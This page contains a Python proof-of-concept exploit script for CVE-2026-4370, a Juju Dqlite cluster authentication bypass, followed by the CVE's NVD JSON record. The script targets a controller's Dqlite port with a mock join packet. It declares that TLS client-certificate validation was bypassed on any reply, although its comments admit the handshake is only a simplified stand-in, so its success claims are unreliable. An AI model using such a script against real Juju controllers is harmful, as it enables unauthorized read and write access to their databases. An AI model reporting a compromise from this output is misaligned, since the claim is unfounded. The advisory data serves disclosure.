CVE-2026-4370

# Conceptual PoC for CVE-2026-4370: Juju Dqlite Auth Bypass # This script simulates a malicious node joining the cluster. # Note: Real exploitation requires implementing the Dqlite/Raft protocol specifics. import socket import struct TARGET_IP = "192.168.1.100" # Juju Controller IP TARGET_PORT = 19002 # Default Dqlite port def exploit_juju_dqlite(): print(f"[*] Attempting to join Juju Dqlite cluster at {TARGET_IP}:{TARGET_PORT}...") try: # 1. Establish TCP connection to Dqlite port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((TARGET_IP, TARGET_PORT)) # 2. Send a Join Request (Protocol specific) # In vulnerable versions, the server accepts this without valid client certs. # This is a simplified representation of the handshake. # Mock Protocol Header + Join Message protocol_version = 1 # Example version msg_type = 0x01 # Example: JOIN type payload = struct.pack("!IB", protocol_version, msg_type) sock.send(payload) # 3. Receive response response = sock.recv(1024) if response: print("[+] Connection established and response received!") print(f"[+] Response: {response}") print("[+] Successfully bypassed TLS client certificate validation.") print("[+] Attacker is now part of the Dqlite cluster.") else: print("[-] No response received. Target might be patched.") sock.close() except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit_juju_dqlite()

{"cve": {"id": "CVE-2026-4370", "sourceIdentifier": "[email protected]", "published": "2026-04-01T09:16:17.717", "lastModified": "2026-04-02T20:24:48.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Juju from version 3.2.0 until 3.6.19 and from version 4.0 until 4.0.4, where the internal Dqlite database cluster fails to perform proper TLS client and server authentication. Specifically, the Juju controller's database endpoint does not validate client certificates when a new node attempts to join the cluster. An unauthenticated attacker with network reachability to the Juju controller's Dqlite port can exploit this flaw to join the database cluster. Once joined, the attacker gains full read and write access to the underlying database, allowing for total data compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}, {"lang": "en", "value": "CWE-306"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.6.20", "matchCriteriaId": "C1E8860B-D8C6-4795-A4F8-5EA1E8CB2381"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndExcluding": "4.0.5", "matchCriteriaId": "D900BC29-F5B7-4485-BB1D-42E9778D0A82"}]}]}], "references": [{"url": "https://github.com/juju/juju/security/advisories/GHSA-gvrj-cjch-728p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}